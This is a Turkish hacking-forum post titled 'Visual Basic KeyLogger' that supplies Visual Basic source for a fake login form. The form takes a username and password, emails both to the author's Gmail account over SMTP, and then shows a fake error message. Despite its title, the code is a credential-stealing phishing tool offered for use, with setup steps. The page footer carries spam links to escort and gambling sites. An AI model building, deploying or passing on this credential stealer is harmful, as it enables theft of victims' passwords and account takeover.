Visual Basic KeyLogger

Ec0

Yeni Üye
Katılım
26 Şub 2017
Mesajlar
27
Tepkime puanı
0
Puanları
0
2 TextBox 2 Label 1 Button Tasarim size kalmis...
Visual Basic ' te KEylogger Sourcesi : (<--- Nin ilerisini silin )


Imports System.Net.Mail <----- General ' a Burasi


<----Burdan Asagisida Buttona
If TextBox1.Text = "" Then
MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("GMail ADresiNiz", "Gmail ŞifreNiz")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Gmail")
mail.To.Add("Gmail")
mail.Subject = "Username : " & TextBox1.Text
mail.Body = "Password : " & TextBox2.Text & ","
smtpServer.Send(mail)
MsgBox("Bilgileri girdikten sonra hata mesajında ne yazsın ?")
MsgBox("Bilgileri girdikten sonra hata mesajında ne yazsın ?")
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol puff sakarya escort sakarya escort Gamdom
Üst
Copyright® Ajanlar.org 2012